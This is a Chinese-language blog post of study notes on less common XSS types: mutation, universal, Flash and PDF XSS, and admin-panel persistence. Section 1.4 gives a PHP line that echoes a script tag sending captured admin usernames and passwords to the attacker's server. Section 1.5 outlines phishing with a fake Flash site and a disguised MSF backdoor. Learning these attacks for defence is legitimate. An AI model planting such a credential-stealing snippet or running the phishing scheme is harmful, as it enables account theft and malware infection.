xss基础知识2.0

xss基础知识2.0

前言:之前我们分析的都是反射型xss,存储型xss,和dom型xss,今天来学习下别的类型

1.0 mxss

mxss是突变型xss,指最初提交的payload并不会直接产生xss,而是由于一些特殊原因,导

致payload发生编译,导致 的xss,比如早期qq的预览功能导致博客园对原本过滤失效导致的

xss

1.1 uxss

uxss利用浏览器或者浏览器扩展制造产生xss并装逼行代码的攻击类型,例子是CVE2021-

34506,该漏洞出现于一版本的edge浏览器中,具体的利用为任何地方只要搜索跨站语句,

启用翻译功能翻译页面后,就会出现xss。

1.2 Flash xss

首先我们要认识一下swf,swf是适用于flash的专用文件格式,用于网页,动画制作。在swf

文件中可以调用js代码并执行,在js中也可以调用swf代码并执行。

swf文件内容正常是编译过的,我们想要查看源代码需要使用swf反编译,使用比如JPEXS

在swf中执行js代码的函数为ExternalInterface 我们在swf文件中通过寻找该函数判断是否存在

xss注入点,如果ExternalInterface的参数中存在可控变量,便产生了xss注入。

我们实际去利用过程便是搜索包存在swf文件的网站,然后利用插件将其下载下来,反编译其代码

进行利用。

1.3 pdf xss

在pdf中是可以运行javascript代码的,我们在pdf编辑器中添加可运行的js代码,大部分浏览器打开

pdf文件时会触发js代码,我们将pdf文件上传到某网站,然后访问上传上去的pdf的url,如果网站

设置访问后是预览模式且没有过滤,即可触发xss,我们利用该url可以进行xss攻击。

1.4 xss后台植入cookie,表单劫持

当我们在网站后台写入后门或者获取管理员账户密码后,很可能过段时间后门会被删除或者密码会被

修改,我们怎么去维持管理员权限呢?我们获取到后台权限后,在后台登陆页面插入获得

cookie的js代码,即使后门被删除或者管理员密码发生更改,我们仍然能获取新的管理员密

码,从而达到权限维持的结果。

但是有些网站对cookie有过滤,导致我们获取cookie不全,这时候就要利用另一种方式去获

去表单密码了。

我们先去后台查看登陆页面的代码,查看表单发送账号密码的目标文件

然后在接受账号密码的文件中加入账号密码发送代码,比如这个

$up="<script src=你的服务器地址/本地接受文件?密码=接受到的密码&账号=接收到的账号></script>";
echo $up;

这样就可以让该script语句执行从而获取到账号和密码。

1.5 XSS Flash钓鱼配合MSF捆绑上线

首先用相似域名搭建伪造flash官方网站,在下载连接处放自己的后门,用户下载安装后在安

装正常软件的过程中同时允许后门,用MSF制作该文件,用解压缩软件制作.exe,设置文件的

允许次序后更改.exe图标像正常文件靠拢。在压缩设置时设置自解压路径和解压后自动打开后

门,这样目标安装时就会启动后门了。具体还得涉及后门的免杀,这就需要以后的学习了。

posted @ 2024-03-23 00:19  折翼的小鸟先生  阅读(3)  评论(0编辑  收藏  举报